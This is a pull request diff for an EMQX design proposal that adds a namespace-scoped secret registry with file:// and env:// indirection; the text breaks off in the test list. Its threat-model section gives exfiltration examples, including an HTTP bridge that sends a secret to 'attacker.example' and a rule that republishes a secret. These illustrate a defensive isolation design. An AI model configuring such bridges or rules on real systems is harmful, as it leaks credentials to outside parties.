### PR TITLE
Add EIP 0038: secret registry for data-integration templates

### DIFF
--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -12,6 +12,10 @@
   to a global secret only when that global secret is explicitly marked
   shareable. A global secret is tenant-invisible by default. Global→namespace
   and sibling-namespace resolution remain forbidden
+* 2026-07-24: @zmstone A stored value may be a `file://` / `env://` source
+  reference resolved at use time (per @savonarola), so file/env-delivered
+  secrets (Vault Agent, K8s secret volumes) are referenceable without copying
+  plaintext into the registry — no per-source placeholder variant
 
 ## Abstract
 
@@ -29,8 +33,12 @@ templates -- HTTP bridge headers / URLs / bodies, HTTP authn / authz
 request templates, webhook actions. It is not a general-purpose
 configuration store, not an MQTT publish payload source, and not a
 key-management service. Encryption at rest, automatic rotation, and
-secret-broker integration (Vault, AWS Secrets Manager) are explicit
-non-goals for v1.
+direct secret-broker API integration (Vault, AWS Secrets Manager) are
+explicit non-goals for v1 — though a stored value may be a
+`file://` / `env://` reference resolved at use time, so secrets
+delivered as files or environment variables (Vault Agent, Kubernetes
+secret volumes) can be referenced without copying their plaintext into
+the registry (see "Value indirection").
 
 Read-back over the API returns metadata only -- the stored byte string
 never leaves the broker except as part of a rendered template at the
@@ -108,7 +116,7 @@ This proposal targets EMQX v7.
 A new application `emqx_secret_registry` under `apps/` provides:
 
 * A cluster-wide mnesia / mria table storing
-  `#emqx_secret{{Scope, Name}, Value, ...metadata...}` rows (see
+  `#emqx_secret{key = {Scope, Name}, value = Value, ...metadata...}` rows (see
   "Storage shape"). Replicated to all nodes via the same shard
   mechanism used by existing config tables.
 * An HTTP API under `/api/v5/secrets/...` for create,
@@ -131,7 +139,7 @@ Record:
 ```
 {emqx_secret,
    key         :: {?global_ns | binary(), binary()},  %% {Scope, Name}
-   value       :: binary(),      %% raw bytes, UTF-8 well-formed
+   value       :: binary(),      %% literal bytes, or a file://|env:// source reference
    share_ns    :: boolean(),     %% global secret reachable from namespaces? default false
    description :: binary(),      %% operator-supplied free-form note, optional
    created_at  :: integer(),     %% monotonic millis
@@ -162,6 +170,10 @@ Constraints:
   cap. Names are case-sensitive.
 * `value` is at most 16 KiB. Stored as-is after a UTF-8 well-formedness
   check. PEM-encoded private keys (newline-containing) are permitted.
+  A `file://` / `env://` source reference (see "Value indirection") is
+  just a short value that passes the same check; the size / encoding
+  of the *resolved* bytes is the referenced source's concern, checked
+  at the use site like any literal value.
 * `description` is at most 512 bytes, UTF-8, control-character-free
   except whitespace.
 * The total number of secrets is capped at 1024 **per namespace**
@@ -171,6 +183,47 @@ Constraints:
   registry for everyone; the precedents are `?MAX_NUM_TNS_CONFIGS`
   (1000 managed namespaces) and `?MAX_COLLECTIONS` (512 topic-metric
   collections).
+
+### Value indirection: external sources
+
+A stored `value` is normally a literal byte string. It may instead be
+a **source reference** that EMQX resolves to bytes at use time:
+
+* `file://<path>` — read the bytes from a file on the resolving node's
+  filesystem.
+* `env://<VARNAME>` — read the bytes from an environment variable.
+
+The registry row then holds only the reference, never the underlying
+secret bytes. This is the interoperability path for operators who
+already deliver secrets through Vault Agent, Kubernetes secret
+volumes, or an init container: the external tooling drops the real
+secret as a file (or exports it into the environment), and the
+registry entry points at it. The plaintext never enters the mnesia
+table, the backup, or `cluster.hocon`, yet `$secret{<name>}`,
+`get_secret('<name>')`, and `secret://<name>` all keep working
+unchanged — resolution of the name simply yields the reference, which
+is then resolved one step further to the bytes.
+
+This reuses existing plumbing rather than adding a token per source:
+the same `emqx_secret_loader` / `emqx_schema_secret` machinery that
+already resolves `file://` for HOCON secret fields resolves the
+registry value. The source is chosen in the *value*, not pinned in the
+*template* — there is deliberately no `$secret_file{}` / `$secret_env{}`
+placeholder variant; `$secret{<name>}` is source-agnostic and the row
+decides where the bytes come from. A value is treated as a reference
+iff it matches `^(file|env)://`, the same scheme-detection convention
+`emqx_schema_secret` already uses (so, as today, a literal value that
+must itself begin with those characters is the one shape not
+expressible — not a concern for credentials).
+
+Resolution timing and failure follow the literal case exactly: the
+reference is resolved at render time (placeholders) or at connector /
+action start (`secret://` HOCON fields), and a resolution failure
+(file missing, variable unset) produces the same strict-fail as an
+unknown secret — name reported, value never. Because the stored value
+is a path or variable name and not the secret itself, it is not
+redaction-sensitive; the API's no-read-back rule is unchanged (the
+reference is still not returned, and neither is the resolved value).
 
 ### Sanitization
 
@@ -836,6 +889,13 @@ required template variables in HTTP bridges.
   passes), but rejected at the HTTP bridge connector when used as a
   header value. Verify the rejection path emits a log line that
   identifies the secret by name but not by value.
+* Value indirection: a secret stored as `file://<path>` resolves to
+  the file's bytes at use time and the mnesia row never contains the
+  plaintext; `env://<VAR>` resolves from the environment; a missing
+  file / unset variable strict-fails by name, never leaking a value;
+  updating the referenced file changes what the next render resolves
+  with no registry write. Confirm export / `cluster.hocon` dumps carry
+  only the reference, not the resolved bytes.
 
 ## Declined Alternatives
 
@@ -869,19 +929,29 @@ encryption (LUKS, AWS EBS encryption, GCP persistent disk
 encryption) provides the at-rest property without adding key
 management to EMQX's surface area. Mention as a possible v2.
 
-### Vault / AWS Secrets Manager / external broker integration
+### Direct secret-broker API integration (Vault, AWS Secrets Manager)
 
 Considered: instead of (or in addition to) a built-in registry,
-support fetching secrets from external secret brokers at render
-time. Rejected for v1 on two grounds: it expands the surface area
-significantly (broker plugins, credential management for the broker
-connection, timeout / cache semantics for slow brokers, error
+support fetching secrets directly from an external secret broker's API
+at render time. Rejected for v1 on two grounds: it expands the surface
+area significantly (broker plugins, credential management for the
+broker connection, timeout / cache semantics for slow brokers, error
 handling for "broker reachable but secret missing" vs "broker
 unreachable"), and it shifts the operational model from "EMQX is
-self-contained" to "EMQX has a hard runtime dependency on an
-external secret service." Operators who want Vault-backed secrets
-can run a Vault Agent sidecar that templates a HOCON file containing
-`emqx_secret_registry` CRUD calls and re-applies on rotation.
+self-contained" to "EMQX has a hard runtime dependency on an external
+secret service."
+
+Interoperability with those brokers is instead achieved *indirectly*,
+through value indirection (see "Value indirection"): a Vault Agent /
+Kubernetes secret volume / init container materialises the secret as a
+file or an environment variable, and the registry entry stores the
+`file://` / `env://` reference. EMQX resolves it at use time and never
+holds the plaintext. This covers the common "our secrets already come
+from Vault/K8s" case without EMQX taking on a broker-client
+dependency; rotation is handled by the external tooling refreshing the
+file / variable, with no registry write at all. Direct broker-API
+integration can still be added later for cases indirection does not
+cover (e.g. per-render dynamic secrets).
 
 ### Returning the value via GET
 

--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -3,6 +3,7 @@
 ## Changelog
 
 * 2026-05-21: @zmstone Initial draft
+* 2026-07-20: @zmstone Add namespace scoping / isolation
 
 ## Abstract
 
@@ -26,6 +27,11 @@ non-goals for v1.
 Read-back over the API returns metadata only -- the stored byte string
 never leaves the broker except as part of a rendered template at the
 moment the template is used.
+
+Secrets are namespace-scoped: a secret is owned by the namespace of
+the principal that created it, a namespaced reference resolves
+against that namespace first and falls back to the global registry,
+and a global reference never resolves to a namespace-owned secret.
 
 ## Motivation
 
@@ -91,13 +97,19 @@ Record:
 
 ```
 {emqx_secret,
-   name        :: binary(),      %% primary key, ^[A-Za-z0-9][A-Za-z0-9_-]{0,62}$
+   key         :: {?global_ns | binary(), binary()},  %% {OwnerNs, Name}
    value       :: binary(),      %% raw bytes, UTF-8 well-formed
    description :: binary(),      %% operator-supplied free-form note, optional
    created_at  :: integer(),     %% monotonic millis
    updated_at  :: integer()      %% monotonic millis
 }
 ```
+
+The primary key is the `{OwnerNs, Name}` pair, following the v2
+topic-metrics precedent (`emqx_topic_metrics_mria`, keyed
+`{'_' | global | binary(), '_' | binary()}`). Names are unique
+*within* a namespace, not cluster-wide. See "Namespace scoping"
+below.
 
 Constraints:
 
@@ -108,8 +120,13 @@ Constraints:
   check. PEM-encoded private keys (newline-containing) are permitted.
 * `description` is at most 512 bytes, UTF-8, control-character-free
   except whitespace.
-* The total number of secrets in the cluster is capped at 1024 (configurable;
-  see Configuration Changes).
+* The total number of secrets is capped at 1024 **per namespace**
+  (configurable; see Configuration Changes), with the global namespace
+  counting as one namespace for this purpose. A per-namespace cap
+  rather than a cluster-wide one keeps one tenant from exhausting the
+  registry for everyone; the precedents are `?MAX_NUM_TNS_CONFIGS`
+  (1000 managed namespaces) and `?MAX_COLLECTIONS` (512 topic-metric
+  collections).
 
 ### Sanitization
 
@@ -358,6 +375,10 @@ Endpoints:
   Removes the secret. The renderer's strict-fail behavior applies to
   any subsequent template render that references the deleted name.
 
+All five endpoints accept a `?ns=<namespace>` query parameter and are
+scoped to the caller's namespace; see "Namespace scoping and
+isolation" above.
+
 ### Logging and tracing
 
 All log emissions involving template rendering must go through the
@@ -401,6 +422,180 @@ during implementation). This means:
 The secret registry does **not** require its own shard, its own
 quorum, or any cluster-wide RPC during render. Render-time lookups
 are local mnesia dirty reads.
+
+### Namespace scoping and isolation
+
+EMQX supports namespaces (multi-tenancy) for connectors, actions,
+sources, rules, authn / authz built-in-database records, managed
+certificates, and topic metrics. Secrets are referenced from
+precisely those resources, so the registry must be namespace-aware or
+it becomes the one shared mutable surface that punches through tenant
+isolation.
+
+#### Ownership model
+
+Every secret is owned by exactly one namespace. The owner is the
+namespace of the principal that created it, determined the same way
+every other namespaced API determines it:
+
+* The namespace is encoded in the API key / dashboard user role as
+  `ns:<namespace>::<role>` and parsed by
+  `emqx_dashboard_rbac:parse_role/1`.
+* At the HTTP boundary `emqx_dashboard:get_namespace/1` reads it out
+  of `auth_meta`, defaulting to `?global_ns`.
+* A `resolve_namespace/2` minirest filter stores the effective
+  namespace as `resolved_ns` on the request, applying the established
+  rule: a **global** admin may act on any namespace by passing
+  `?ns=<namespace>`; a **namespaced** admin is pinned to their own and
+  gets `not_authorized` if they pass a different one. This mirrors
+  `emqx_connector_api:parse_namespace/1`.
+
+A secret created with a global API key is owned by `?global_ns`. A
+secret created with a namespace-scoped API key is owned by that
+namespace.
+
+#### Resolution: namespace first, then global fallback
+
+This is the requirement raised in review: an operator needs one
+system-wide secret usable from a *global* HTTP authn hook **and**
+from a *namespace-scoped* HTTP hook, while namespaces must also be
+able to hold their own private secrets.
+
+Resolution of a bare name `N` from a context running in namespace
+`NS` is therefore:
+
+1. Look up `{NS, N}`. On hit, use it.
+2. On miss, look up `{?global_ns, N}`. On hit, use it.
+3. On miss, apply the strict-fail behavior described earlier.
+
+Resolution from a context running in the global namespace looks up
+`{?global_ns, N}` **only**. There is no upward fallback — a global
+configuration can never resolve to a namespace-owned secret. That
+direction would let a tenant inject a value into a broker-wide code
+path, which is exactly the isolation break we are trying to avoid.
+
+Two existing fallback designs are in tree and they differ
+deliberately:
+
+* `emqx_authz_mnesia:load_rules_for_authorize/3` falls back to global
+  per lookup, whenever the namespaced lookup yields nothing.
+* `emqx_authn_mnesia:lookup_user_with_fallback/3` falls back **only
+  if the namespace has no records at all**, precisely to avoid
+  per-user shadowing in a partially-provisioned namespace.
+
+We adopt the authz (per-name) granularity. The authn concern does not
+transfer: a partially-populated namespace of *users* creates an
+authentication bypass, whereas a namespace that defines some of its
+own secrets and inherits the rest is the intended operating mode for
+this feature — "the tenant overrides the shared backend token but
+inherits the shared signing key."
+
+#### Shadowing is an override, and it is bounded
+
+A namespace can define `{NS, "prod_token"}` while `{global,
+"prod_token"}` also exists. The namespaced one wins for anything
+running in `NS`. This is deliberate — it is how a tenant overrides an
+inherited default — and it is safe because the only configurations
+that resolve through `NS` are configurations *owned by* `NS`. A
+tenant can redirect their own bridges to their own credential; they
+cannot affect anyone else's.
+
+For the cases where an operator wants to defeat shadowing and pin a
+reference to the global registry explicitly, both reference syntaxes
+accept a qualified form:
+
+* `$secret{global::<name>}` for the placeholder.
+* `secret://global/<name>` for the HOCON URI.
+
+The unqualified forms keep their fallback semantics. `global` is
+already a reserved namespace name
+(`emqx:is_reserved_namespace/1` rejects `global`, `undefined`,
+`null`, `none`), so the qualifier cannot collide with a real
+namespace.
+
+We do **not** adopt the managed-certs convention of an explicit
+optional `namespace` field defaulting to global
+(`emqx_schema:fields("managed_certs")`, resolved in
+`emqx_tls_lib:resolve_managed_certs/2`) — that form permits arbitrary
+cross-namespace references and currently performs no authorization
+check on them. Only two targets are reachable here: the caller's own
+namespace and global.
+
+#### Where the namespace comes from at resolution time
+
+Each of the three access paths already has the namespace in hand:
+
+| Access path | Source of namespace |
+|---|---|
+| `secret://<name>` in a connector / action / source config | The resource is namespaced; the namespace is carried in the resource id (`ns:<Ns>:connector:<Type>:<Name>`) and extractable via `emqx_resource:extract_namespace_from_resource_id/1`. |
+| `$secret{<name>}` in an HTTP bridge / action template | Same — the rendering happens inside a namespaced resource. |
+| `$secret{<name>}` / `get_secret('<name>')` in a rule | The rule record carries `namespace`; `emqx_rule_runtime` already propagates it into every action invocation and trace context. |
+| `$secret{<name>}` in an HTTP authn / authz request template | The authenticator / authz source is itself namespaced; the namespace comes from the chain the client authenticated against. |
+
+The practical implication for implementation is that
+`emqx_secret_loader:load/1` and the template renderer hooks must take
+a `maybe_namespace()` argument rather than a bare name. Threading
+that argument through every call site is the bulk of the work — a
+default-to-global arity-1 wrapper would compile, and would silently
+resolve every namespaced lookup against the global registry. It must
+not be added.
+
+#### API surface
+
+The endpoints described above gain the standard namespace plumbing:
+
+* A `?ns=<namespace>` query parameter on all five endpoints, honoured
+  for global admins, rejected for namespaced admins naming a
+  namespace other than their own.
+* `validate_managed_namespace/2` on create — running the
+  `'namespace.resource_pre_create'` hook, returning
+  `Managed namespace not found` for an unknown namespace, exactly as
+  the connector / rule / authn APIs do. `DELETE` is exempted for
+  global admins so orphaned secrets can be cleaned up after a
+  namespace is gone.
+* A `?SECRETS_API` clause in `emqx_dashboard_rbac:do_check_rbac/3`.
+  Without it the catch-all denies namespaced admins outright.
+
+One caveat has to be recorded explicitly. `do_check_rbac/3` currently
+contains a blanket clause allowing **any** `GET` for a namespaced
+superuser, on the documented rationale that "namespaces are mostly to
+avoid accidentally mutating the wrong resources rather than hiding
+information." For this feature that rationale does not hold: a
+namespaced admin must not be able to enumerate another tenant's
+secret *names*, since names are chosen by operators and routinely
+describe the system they unlock. The secrets API therefore filters
+list / get results by `resolved_ns` **in the handler**, not relying
+on the RBAC layer. A namespaced admin listing secrets sees their own
+namespace's secrets plus the global ones they can inherit; never
+another namespace's.
+
+Values are never returned by any endpoint regardless of namespace, so
+the isolation being enforced here is over names and metadata only.
+
+#### Namespace deletion
+
+The registry subscribes to the `'namespace.delete'` hookpoint and
+deletes all rows keyed `{NS, _}`. Secrets live outside the config
+tree, so the `emqx_mt_config_janitor` config-root teardown does not
+reach them — a hook callback is required, not optional. This is the
+same gap that authn / authz namespaced mnesia rows and v2
+topic-metrics collections currently have; we should not add a third
+instance of it.
+
+The callback must be idempotent and retry-safe: the janitor re-scans
+tombstones periodically and re-runs cleanup if a previous attempt
+failed.
+
+Deleting a namespace does **not** touch global secrets, including
+ones the namespace's configurations were resolving via fallback.
+
+#### Backup / export
+
+The registry is excluded from backup entirely (see "Backup / export"
+above), so there is no per-namespace export behavior to define. Were
+it to become opt-in later, the export must be filtered by the
+requesting principal's namespace — a namespaced admin's export must
+not carry global or sibling-namespace secrets.
 
 ## Configuration Changes
 
@@ -450,6 +645,22 @@ required template variables in HTTP bridges.
 * Backup tests: `emqx ctl data export` produces an archive that
   contains no secret values; `data import` rejects archives
   containing a secrets table when the cluster already has secrets.
+* Namespace tests -- the isolation-critical class:
+  * A namespaced config resolves a bare name to its own namespace's
+    secret when one exists, and to the global one when it does not.
+  * A global config never resolves to a namespace-owned secret, even
+    when the name exists only in a namespace.
+  * Shadowing: `{NS, "tok"}` wins over `{global, "tok"}` for
+    configurations in `NS`, and leaves other namespaces' resolution
+    unaffected.
+  * `$secret{global::name}` / `secret://global/name` bypass a
+    shadowing namespace-local entry.
+  * A namespaced admin cannot create, read, update, delete, or
+    **list** another namespace's secrets; a global admin can act on
+    any namespace via `?ns=`.
+  * Per-namespace cap is enforced per namespace, not cluster-wide.
+  * `'namespace.delete'` removes exactly that namespace's secrets and
+    leaves global ones intact; re-running the cleanup is a no-op.
 * HTTP-header byte check composition: a stored secret whose value
   contains CR / LF is accepted at storage time (UTF-8-only check
   passes), but rejected at the HTTP bridge connector when used as a

--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -4,6 +4,9 @@
 
 * 2026-05-21: @zmstone Initial draft
 * 2026-07-20: @zmstone Add namespace scoping / isolation
+* 2026-07-23: @zmstone Drop cross-namespace secret sharing: reference implies
+  disclosure, so secrets are reachable only within their own scope (namespace
+  or global), with no fallback in either direction
 
 ## Abstract
 
@@ -28,10 +31,20 @@ Read-back over the API returns metadata only -- the stored byte string
 never leaves the broker except as part of a rendered template at the
 moment the template is used.
 
-Secrets are namespace-scoped: a secret is owned by the namespace of
-the principal that created it, a namespaced reference resolves
-against that namespace first and falls back to the global registry,
-and a global reference never resolves to a namespace-owned secret.
+Secrets are scoped: a secret is owned by the scope of the principal
+that created it — a namespace, or global — and is reachable only from
+configurations running in that same scope. There is no cross-scope
+resolution in either direction: a namespace cannot reference a global
+or sibling-namespace secret, and a global configuration cannot
+reference a namespace's. This strictness is deliberate. Because a
+secret is resolved by rendering it into outbound bytes, and the
+principals who reference secrets are the same principals who choose
+where those bytes go, the ability to *reference* a secret is
+equivalent to the ability to *read* its value. The registry's
+no-read-back API therefore bounds exposure of secrets at rest (config
+dumps, backups, logs) but is not an access-control boundary between
+"can configure" and "can learn the value"; isolation is enforced
+purely by non-reachability across scopes.
 
 ## Motivation
 
@@ -49,10 +62,15 @@ Three concrete pain points follow:
 * **Operational**: rotation is N-touch. Tooling to mass-update the
   same value across configs is missing today and would be brittle if
   added (matching by string equality across heterogeneous templates).
-* **Audit / governance**: an operator who needs to configure a new
-  bridge today must know the value of the shared API token. There is
-  no way to grant "you can reference the production token" without
-  also granting "you can read its value."
+* **Audit / governance**: the same shared API token is copied into
+  many configs, so its plaintext lives in many places at once —
+  `cluster.hocon`, dashboard config views, export artifacts. There is
+  no single named handle to rotate, revoke, or reason about. (Note:
+  the registry does *not* create a "reference but cannot read"
+  privilege — see "Security model: reference implies disclosure"; a
+  principal who can put the token into a config they control can
+  always recover its value. What the registry removes is the token's
+  *at-rest* sprawl, not the operator's knowledge of it.)
 * **Exposure**: rendered templates appear in client trace, in rule
   engine debug output, and in HTTP request logs at the bridge level.
   Today there is no opt-in mechanism for "render this token, but
@@ -104,6 +122,12 @@ Record:
    updated_at  :: integer()      %% monotonic millis
 }
 ```
+
+The owning scope (`?global_ns` or a namespace) is the first element
+of the key. A secret is reachable only from configurations running in
+its owning scope; there is no cross-scope resolution (see "Namespace
+scoping and isolation" below), so no per-secret sharing attribute is
+needed.
 
 The primary key is the `{OwnerNs, Name}` pair, following the v2
 topic-metrics precedent (`emqx_topic_metrics_mria`, keyed
@@ -361,13 +385,19 @@ Endpoints:
 
 * `POST /api/v5/secrets`
   body: `{ "name": "...", "value": "...", "description": "..." }`
-  Creates a new secret. Errors on name collision.
+  Creates a new secret in the caller's scope. Errors on name
+  collision within that scope.
 * `GET /api/v5/secrets`
-  Returns a paginated list of `{ name, description, created_at,
-  updated_at }`. **The value is never returned.**
+  Returns a paginated list of `{ name, description, scope,
+  created_at, updated_at }`, where `scope` is `global` or the owning
+  namespace. **The value is never returned.** The list contains only
+  the caller's own scope; other scopes' secrets are omitted (see
+  "API surface" under Namespace scoping).
 * `GET /api/v5/secrets/{name}`
-  Returns `{ name, description, created_at, updated_at }`. **The
-  value is never returned.**
+  Returns `{ name, description, scope, created_at, updated_at }`.
+  **The value is never returned.** A request for a name outside the
+  caller's scope returns `404`, indistinguishable from a nonexistent
+  name.
 * `PUT /api/v5/secrets/{name}`
   body: `{ "value": "...", "description": "..." }`
   Overwrites the existing secret. This is the rotation path.
@@ -454,72 +484,109 @@ A secret created with a global API key is owned by `?global_ns`. A
 secret created with a namespace-scoped API key is owned by that
 namespace.
 
-#### Resolution: namespace first, then global fallback
+#### Security model: reference implies disclosure
 
-This is the requirement raised in review: an operator needs one
-system-wide secret usable from a *global* HTTP authn hook **and**
-from a *namespace-scoped* HTTP hook, while namespaces must also be
-able to hold their own private secrets.
+The API never returns a value to anyone. It is tempting to read that
+as "an operator can be granted the ability to *reference* a secret
+without being granted the ability to *read* it." For the audience
+that references secrets — principals with data-integration write
+access — that reading is false.
 
-Resolution of a bare name `N` from a context running in namespace
-`NS` is therefore:
+Anyone who can author a data-integration resource controls where its
+rendered output goes, and every such resource is an oracle for the
+secret it references:
 
-1. Look up `{NS, N}`. On hit, use it.
-2. On miss, look up `{?global_ns, N}`. On hit, use it.
-3. On miss, apply the strict-fail behavior described earlier.
+* An HTTP bridge with `X-Steal = "$secret{token}"` and
+  `url = "https://attacker.example/collect"` renders the value onto
+  the wire toward an endpoint the author controls.
+* A rule `SELECT get_secret('token') AS v` that republishes to a
+  topic the author subscribes to leaks the value with no egress at
+  all.
+* Enabling trace on one's own rule that references the secret records
+  the resolved value in the trace log.
 
-Resolution from a context running in the global namespace looks up
-`{?global_ns, N}` **only**. There is no upward fallback — a global
-configuration can never resolve to a namespace-owned secret. That
-direction would let a tenant inject a value into a broker-wide code
-path, which is exactly the isolation break we are trying to avoid.
+So for this feature **the ability to reference a secret is equivalent
+to the ability to read its value.** Disabling read-back on the API
+narrows the exposure of secrets *at rest* (config dumps, backups,
+dashboard, logs — see Motivation) but is not an access-control
+boundary between "can configure" and "can learn the value." The EIP
+does not claim otherwise.
 
-Two existing fallback designs are in tree and they differ
-deliberately:
+The one boundary that *is* real is the negative one: a secret a
+principal **cannot reference** is a secret that principal cannot
+exfiltrate. Cross-scope isolation is therefore built entirely on
+*non-reachability*, not on any view gate.
 
-* `emqx_authz_mnesia:load_rules_for_authorize/3` falls back to global
-  per lookup, whenever the namespaced lookup yields nothing.
-* `emqx_authn_mnesia:lookup_user_with_fallback/3` falls back **only
-  if the namespace has no records at all**, precisely to avoid
-  per-user shadowing in a partially-provisioned namespace.
+#### Resolution: strictly within one scope, no fallback
 
-We adopt the authz (per-name) granularity. The authn concern does not
-transfer: a partially-populated namespace of *users* creates an
-authentication bypass, whereas a namespace that defines some of its
-own secrets and inherits the rest is the intended operating mode for
-this feature — "the tenant overrides the shared backend token but
-inherits the shared signing key."
+Each secret belongs to exactly one scope — a namespace, or global —
+and is reachable only from configurations running in that same scope:
 
-#### Shadowing is an override, and it is bounded
+* A reference (`$secret{N}`, `get_secret('N')`, `secret://N`)
+  evaluated in namespace `NS` resolves `{NS, N}` **only**.
+* A reference evaluated in the global scope resolves
+  `{?global_ns, N}` **only**.
+* On miss — including a name that exists only in a *different* scope —
+  the strict-fail behavior described earlier applies
+  (`{error, {unknown_secret, Name}}`). The failure is identical
+  whether the name is unknown or merely out-of-scope, so a tenant
+  cannot probe for the existence of another scope's names.
 
-A namespace can define `{NS, "prod_token"}` while `{global,
-"prod_token"}` also exists. The namespaced one wins for anything
-running in `NS`. This is deliberate — it is how a tenant overrides an
-inherited default — and it is safe because the only configurations
-that resolve through `NS` are configurations *owned by* `NS`. A
-tenant can redirect their own bridges to their own credential; they
-cannot affect anyone else's.
+There is no namespace→global fallback and no global→namespace
+fallback. Because reference implies disclosure, a fallback that let a
+tenant reference a global secret would be exactly a grant of that
+secret's value to the tenant; a fallback the other direction would
+let a tenant feed a value into a broker-wide code path. Both are the
+isolation breaks we are avoiding, so neither direction exists. No
+qualified `global::<name>` / `secret://global/<name>` cross-scope
+form is provided either — there is no reachable target outside the
+caller's own scope to name.
 
-For the cases where an operator wants to defeat shadowing and pin a
-reference to the global registry explicitly, both reference syntaxes
-accept a qualified form:
+The consequence is deliberate: a credential that must be used from
+both a global configuration and a tenant's configuration is stored
+**once per scope** that uses it. Rotating such a genuinely-common
+credential is therefore per-scope — an N-touch operation across the
+scopes that hold a copy. This is the accepted v1 trade-off for an
+isolation model that is provably simple: one scope, one set of
+reachable secrets, no cross-scope reference anywhere. Targeted
+cross-scope sharing — with its "sharing = disclosing" semantics made
+explicit — is left to a future version; see "Declined alternatives."
 
-* `$secret{global::<name>}` for the placeholder.
-* `secret://global/<name>` for the HOCON URI.
+#### The resolving scope is the configuration's, not the client's
 
-The unqualified forms keep their fallback semantics. `global` is
-already a reserved namespace name
-(`emqx:is_reserved_namespace/1` rejects `global`, `undefined`,
-`null`, `none`), so the qualifier cannot collide with a real
+A secret is resolved in the scope of the *configuration that
+references it*, never in the scope of whatever MQTT client happens to
+trigger the render. This distinction is load-bearing for
+authentication, where the client's namespace is frequently not yet
+established at the moment a secret must be resolved.
+
+A client connects in the **global scope**: its namespace (`tns`) is
+not known at TCP-accept time and is commonly *initialized from the
+authentication result itself* (an authn backend returns a `tns` /
+`namespace` attribute, or it is derived during the authn exchange).
+An HTTP authn / authz request template that references a secret is
+therefore rendered *before* the client has a namespace at all.
+
+Resolution keys off the **authenticator's / authz source's own
+scope**, which is known from that resource's configuration:
+
+* A **namespaced** authenticator (configured under namespace `NS`)
+  resolves its `$secret{...}` references against `{NS, _}`, even
+  though the connecting client is still in the unresolved/global
+  scope. This is *not* a global→namespace fallback: the reference is
+  owned by a namespaced configuration, so it resolves in that
+  namespace by the ordinary rule above. A client being pre-`tns` does
+  not downgrade the authenticator's scope to global.
+* A **global** authenticator resolves against `{?global_ns, _}`.
+
+The implementation must take the resolving namespace from the
+authenticator/source configuration (the chain the client is
+authenticating against), and must **not** substitute the client's
+not-yet-resolved `tns` (which would wrongly fall to global and fail
+to find a namespaced authenticator's secret, breaking namespaced
+authentication). Concretely: do not thread `tns` from the channel
+into secret resolution on the authn path; thread the authenticator's
 namespace.
-
-We do **not** adopt the managed-certs convention of an explicit
-optional `namespace` field defaulting to global
-(`emqx_schema:fields("managed_certs")`, resolved in
-`emqx_tls_lib:resolve_managed_certs/2`) — that form permits arbitrary
-cross-namespace references and currently performs no authorization
-check on them. Only two targets are reachable here: the caller's own
-namespace and global.
 
 #### Where the namespace comes from at resolution time
 
@@ -530,15 +597,17 @@ Each of the three access paths already has the namespace in hand:
 | `secret://<name>` in a connector / action / source config | The resource is namespaced; the namespace is carried in the resource id (`ns:<Ns>:connector:<Type>:<Name>`) and extractable via `emqx_resource:extract_namespace_from_resource_id/1`. |
 | `$secret{<name>}` in an HTTP bridge / action template | Same — the rendering happens inside a namespaced resource. |
 | `$secret{<name>}` / `get_secret('<name>')` in a rule | The rule record carries `namespace`; `emqx_rule_runtime` already propagates it into every action invocation and trace context. |
-| `$secret{<name>}` in an HTTP authn / authz request template | The authenticator / authz source is itself namespaced; the namespace comes from the chain the client authenticated against. |
+| `$secret{<name>}` in an HTTP authn / authz request template | The **authenticator / authz source's own** namespace, taken from its configuration — **not** the connecting client's `tns`, which is typically unresolved at authn time (see "The resolving scope is the configuration's, not the client's"). |
 
 The practical implication for implementation is that
 `emqx_secret_loader:load/1` and the template renderer hooks must take
 a `maybe_namespace()` argument rather than a bare name. Threading
 that argument through every call site is the bulk of the work — a
 default-to-global arity-1 wrapper would compile, and would silently
-resolve every namespaced lookup against the global registry. It must
-not be added.
+resolve every namespaced lookup against the global scope: on the
+data-integration paths it resolves the wrong secret (or fails closed),
+and on the authn path it breaks namespaced authentication by missing
+the authenticator's namespaced secret. It must not be added.
 
 #### API surface
 
@@ -561,16 +630,25 @@ contains a blanket clause allowing **any** `GET` for a namespaced
 superuser, on the documented rationale that "namespaces are mostly to
 avoid accidentally mutating the wrong resources rather than hiding
 information." For this feature that rationale does not hold: a
-namespaced admin must not be able to enumerate another tenant's
-secret *names*, since names are chosen by operators and routinely
-describe the system they unlock. The secrets API therefore filters
-list / get results by `resolved_ns` **in the handler**, not relying
-on the RBAC layer. A namespaced admin listing secrets sees their own
-namespace's secrets plus the global ones they can inherit; never
-another namespace's.
+namespaced admin must not be able to enumerate another scope's secret
+*names*, since names are chosen by operators and routinely describe
+the system they unlock. The secrets API therefore filters list / get
+results **in the handler**, not relying on the RBAC layer. A caller
+whose `resolved_ns` is a namespace `NS` sees exactly the rows owned by
+`NS`; every other row — global secrets and other namespaces' secrets
+alike — is omitted from lists and returns `404` on direct `GET`. A
+global admin (optionally scoped via `?ns=`) sees exactly the rows of
+the scope they are acting in.
 
-Values are never returned by any endpoint regardless of namespace, so
-the isolation being enforced here is over names and metadata only.
+Create / update / delete are restricted to rows the caller owns
+(`resolved_ns`), so a namespaced admin can only manage their own
+namespace's secrets and a global admin only global (or, via `?ns=`, a
+named namespace's) secrets. No principal can reach across scopes.
+
+Values are never returned by any endpoint regardless of scope. As
+"Security model" notes, this bounds at-rest exposure but is not the
+isolation boundary; the isolation boundary is that a scope can neither
+reference nor enumerate any secret outside itself.
 
 #### Namespace deletion
 
@@ -586,8 +664,8 @@ The callback must be idempotent and retry-safe: the janitor re-scans
 tombstones periodically and re-runs cleanup if a previous attempt
 failed.
 
-Deleting a namespace does **not** touch global secrets, including
-ones the namespace's configurations were resolving via fallback.
+Deleting a namespace does **not** touch global secrets or any other
+namespace's secrets; only rows keyed `{NS, _}` are removed.
 
 #### Backup / export
 
@@ -647,20 +725,32 @@ required template variables in HTTP bridges.
   containing a secrets table when the cluster already has secrets.
 * Namespace tests -- the isolation-critical class:
   * A namespaced config resolves a bare name to its own namespace's
-    secret when one exists, and to the global one when it does not.
-  * A global config never resolves to a namespace-owned secret, even
-    when the name exists only in a namespace.
-  * Shadowing: `{NS, "tok"}` wins over `{global, "tok"}` for
-    configurations in `NS`, and leaves other namespaces' resolution
-    unaffected.
-  * `$secret{global::name}` / `secret://global/name` bypass a
-    shadowing namespace-local entry.
+    secret; the same name existing only in the global scope (or in a
+    sibling namespace) is **not** resolved and strict-fails, with a
+    failure indistinguishable from a nonexistent name. This is the
+    value-exfiltration test: a tenant bridge referencing a global name
